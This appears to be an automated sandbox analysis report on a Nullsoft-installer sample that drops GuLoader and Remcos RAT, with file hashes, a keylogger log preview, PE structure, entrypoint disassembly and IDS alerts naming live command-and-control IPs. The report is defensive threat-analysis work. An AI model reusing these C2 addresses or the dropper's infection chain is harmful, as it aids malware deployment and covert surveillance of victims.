                                                                                                                                                                                                        Preview:.. .... ....................*...y..........................@...9&...{..%'...{..h...@.........................Be ....y7.........................................................................................................bJ......n...............................................................@...@....................................... ......."!...{..............................................................@...........................................................................................................................N...:....y!..................................v@.%'...{..................F}..%'...{..................@........#......h...@...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7680
                                                                                                                                                                                                        Entropy (8bit):5.220213965432121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:8e3k1LFJaO1/radJEaYtv1Zs4lkL8y3A2EN8Cmy3uTF4j7J3kWyy/:t0TJa2roqJyA2EN8diuTSje
                                                                                                                                                                                                        MD5:5DA88848798426643F9810237B58937D
                                                                                                                                                                                                        SHA1:E1830DCA870437116B93DECBA8D0BA81F1056D65
                                                                                                                                                                                                        SHA-256:27D3E3E359E1E04B173277221055D043E2F3BAAF78A5D6F7E3A0A5DFCB96222C
                                                                                                                                                                                                        SHA-512:859D0FEF023B6FB9C41589E4AA5BCFC23259639AAAD2FB51E1304725D6E28852BD6B6A68FFCA8C6A20ADAE4D735E6A03620890036ED57095F40318804153F586
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....z.W...........!................"........ ...............................`.......................................$....... ..d............................P....................................................... ...............................text...D........................... ..`.rdata....... ......................@..@.data........0......................@....reloc..v....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):5.6557532861400945
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
                                                                                                                                                                                                        MD5:0FF2D70CFDC8095EA99CA2DABBEC3CD7
                                                                                                                                                                                                        SHA1:10C51496D37CECD0E8A503A5A9BB2329D9B38116
                                                                                                                                                                                                        SHA-256:982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
                                                                                                                                                                                                        SHA-512:CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: FhmDxxpEZM.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: FhmDxxpEZM.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: FfpHp8F4pY.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: FfpHp8F4pY.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: mgtq5agGDy.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: mgtq5agGDy.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: AlKwm5EGna.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: H66BPNLUSu.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: H66BPNLUSu.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: AlKwm5EGna.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Lithoglyptic.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Lithoglyptic.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 5283079616_INV_SZV_WJG_001_20230830_180210.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsDialogs.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                        Entropy (8bit):5.099620413135966
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:oWa8cSzvTyl4tgi8pPjQM0PuAg0YNyZIFtSP:DaBSzm+t18pZ0WAg0RZIFg
                                                                                                                                                                                                        MD5:D6C3DD680C6467D07D730255D0EE5D87
                                                                                                                                                                                                        SHA1:57E7A1D142032652256291B8ED2703B3DC1DFA9B
                                                                                                                                                                                                        SHA-256:AEDB5122C12037BCF5C79C2197D1474E759CF47C67C37CDB21CF27428854A55B
                                                                                                                                                                                                        SHA-512:C28613D6D91C1F1F7951116F114DA1C49E5F4994C855E522930BB4A8BDD73F12CADF1C6DCB84FC8D9F983EC60A40AC39522D3F86695E17EC88DA4BD91C7B6A51
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....z.W...........!.........0...............0.......................................................................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..v............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsExec.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                                                        Entropy (8bit):5.140229856656103
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                                                                                                                                                        MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                                                                                                                                                        SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                                                                                                                                                        SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                                                                                                                                                        SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\uhrhlaw

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\paqlgkfs.dat

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):424
                                                                                                                                                                                                        Entropy (8bit):3.435263143514028
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:KlrlzVmUecmlrlzVmIbWFe5ElrlzVYlrlzVqbWItN2LPL5l:+VqcSVxWqMVuVcWIt0Nl
                                                                                                                                                                                                        MD5:BC56A0DA88A2F892D60BBD233BCD27DE
                                                                                                                                                                                                        SHA1:934CDA03DD8CCC543B8095BA6CFCDB49C4041D80
                                                                                                                                                                                                        SHA-256:20F61D90B5335E81C05DCD2D731AB8A41F612B9C061C5DCB65F5C02A04A7D82A
                                                                                                                                                                                                        SHA-512:3AD597A4D80AAA7CB288E0A26637139824A50F2AE856F8184ECF45957E765FF7E71B2A9138E2A10C4EA11E4470F7DE1BE4400A40E755B3BA18A54A3E5DF9FD93
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
                                                                                                                                                                                                        Preview:....[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.5. .R.u.n.].........[.2.0.2.3./.1.0./.2.3. .2.0.:.3.9.:.4.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.9.7.1. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Entropy (8bit):7.916213399899471
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File size:2'729'832 bytes
                                                                                                                                                                                                        MD5:b434372e36a7d17bc61c8062bbc14015
                                                                                                                                                                                                        SHA1:1e28e9114efdf6bd2a9e0e96cd69b046abf94315
                                                                                                                                                                                                        SHA256:b94541afbfc65ad19aa72f3c547c65c0e0e6e706c7cd18c31c80efe501d28346
                                                                                                                                                                                                        SHA512:761fec13102a69ea6af89c4653a8954a2399b1db0d68149c90f1338e6c6e044f0e54562b8f898b598b8cee8ed9ff881eb8af169c3723f3e6c4608102b7fb4183
                                                                                                                                                                                                        SSDEEP:49152:VM18QnXN81BUCV5VliUYmuyKLbokCQf8TlJoT9ESCPRGT8Ps+:Van9+B3r5YcsboCc29DKGYs+
                                                                                                                                                                                                        TLSH:BFC5236AD244D0A3E65004345EE7DF319F269C549460469A27F8BE1F3DBE3137C2A2EE
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:0721587958601f07

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x4032a0
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                        Signature Issuer:E=Nedskrivningernes@Sammier.Bor, OU="Limiterede Lichenization Untitular ", O=Groundsel, L=Kingsteignton, S=England, C=GB
                                                                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                        • 14/01/2023 07:13:48 13/01/2026 07:13:48
                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                        • E=Nedskrivningernes@Sammier.Bor, OU="Limiterede Lichenization Untitular ", O=Groundsel, L=Kingsteignton, S=England, C=GB
                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                        Thumbprint MD5:107DDDF05A7DD0B08EA7D7C920A6AB3B
                                                                                                                                                                                                        Thumbprint SHA-1:2B0ABF4D3E3DB2DC277FE8267A0674C27EC69A97
                                                                                                                                                                                                        Thumbprint SHA-256:09C7C39A757FDC8CB9D2AC9AA305BDC1B811874557CE9394D212118E9A78B832
                                                                                                                                                                                                        Serial:22EF652A9C8D6EAD222E68906445FAFAFF2B65DB

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                        call dword ptr [004080B0h]
                                                                                                                                                                                                        call dword ptr [004080ACh]
                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                        je 00007FB8D45EF563h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call 00007FB8D45F26A4h
                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                        je 00007FB8D45EF559h
                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                        call eax
                                                                                                                                                                                                        mov esi, 004082B8h
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        call 00007FB8D45F261Eh
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        call dword ptr [0040815Ch]
                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                        jne 00007FB8D45EF53Ch
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        push 00000009h
                                                                                                                                                                                                        call 00007FB8D45F2676h
                                                                                                                                                                                                        push 00000007h
                                                                                                                                                                                                        call 00007FB8D45F266Fh
                                                                                                                                                                                                        mov dword ptr [00434EE4h], eax
                                                                                                                                                                                                        call dword ptr [0040803Ch]
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call dword ptr [004082A4h]
                                                                                                                                                                                                        mov dword ptr [00434F98h], eax
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push 0042B208h
                                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                                        push 0040A2C8h
                                                                                                                                                                                                        push 00433EE0h
                                                                                                                                                                                                        call 00007FB8D45F2258h
                                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                                        mov ebp, 0043F000h
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        call 00007FB8D45F2246h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call dword ptr [00408174h]
                                                                                                                                                                                                        add word ptr [eax], 0000h

                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x309a8.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x2984f00x2278
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x637b0x6400False0.671484375data6.484796945043301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rdata0x80000x14b00x1600False0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0xa0000x2afd80x600False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .ndata0x350000x220000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .rsrc0x570000x309a80x30a00False0.4110298843187661data4.7411066985802535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                        Resources

                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_BITMAP0x574300x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                                        RT_ICON0x577980x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2446912338814622
                                                                                                                                                                                                        RT_ICON0x67fc00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3060752575152407
                                                                                                                                                                                                        RT_ICON0x714680x7d43PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9907381420151558
                                                                                                                                                                                                        RT_ICON0x791b00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.32587800369685765
                                                                                                                                                                                                        RT_ICON0x7e6380x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.31973311289560696
                                                                                                                                                                                                        RT_ICON0x828600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38163900414937757
                                                                                                                                                                                                        RT_ICON0x84e080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41862101313320826
                                                                                                                                                                                                        RT_ICON0x85eb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5073770491803279
                                                                                                                                                                                                        RT_ICON0x868380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                                                                                                                                        RT_DIALOG0x86ca00x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                                        RT_DIALOG0x86de80x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                                        RT_DIALOG0x86f280x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                        RT_DIALOG0x870280x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                        RT_DIALOG0x871480xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                        RT_DIALOG0x872100x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                        RT_GROUP_ICON0x872700x84dataEnglishUnited States0.7348484848484849
                                                                                                                                                                                                        RT_VERSION0x872f80x36cdataEnglishUnited States0.4954337899543379
                                                                                                                                                                                                        RT_MANIFEST0x876680x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                                                                        ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        192.168.11.2077.238.121.25050036802855192 10/23/23-20:39:41.494599TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        192.168.11.2094.156.6.2535003724022032776 10/23/23-20:39:45.144854TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        94.156.6.253192.168.11.202402500372032777 10/23/23-20:46:08.903547TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24025003794.156.6.253192.168.11.20

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.097842932 CEST5003680192.168.11.2077.238.121.250
